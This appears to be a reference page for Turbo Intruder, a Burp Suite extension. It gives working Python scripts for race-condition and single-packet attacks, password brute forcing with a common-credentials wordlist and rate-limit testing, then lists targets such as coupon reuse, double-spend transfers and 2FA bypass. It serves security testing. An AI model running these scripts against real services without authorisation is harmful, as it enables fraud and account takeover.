Description
Turbo Intruder is a Burp Suite extension for sending an extremely large number of HTTP requests at high speed. It uses a scripting engine for complete control over request timing — essential for race condition exploitation, brute force attacks, and single-packet attacks.
Installation
TEXT
# Burp Suite BApp Store
Burp → Extender → BApp Store → Search "Turbo Intruder" → InstallBasic Usage
PYTHON
# In Burp: Right-click request → Extensions → Turbo Intruder → Send to Turbo Intruder
# This opens the scripting interface
# Basic race condition script
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=True)
for i in range(100):
engine.queue(target.req, gate='race1')
engine.openGate('race1') # Send all at once
def handleResponse(req, interesting):
if req.status == 200:
table.add(req)Advanced Usage
PYTHON
# Single-packet attack (most reliable race condition)
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
requestsPerConnection=100,
pipeline=False)
for i in range(20):
engine.queue(target.req, gate='race1')
engine.openGate('race1')
# Brute force with wordlist
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=100,
pipeline=True)
for word in open('/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt'):
engine.queue(target.req, word.rstrip())
# Rate limit testing
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=100,
requestsPerConnection=10,
pipeline=True)
for i in range(1000):
engine.queue(target.req)Common Race Condition Targets
TEXT
# Coupon/discount code redemption (apply same code multiple times)
# Money transfer (double-spend)
# Voting/rating systems (vote multiple times)
# Account creation (duplicate registration bypass)
# File upload (overwrite race)
# OTP/2FA verification (bypass rate limiting)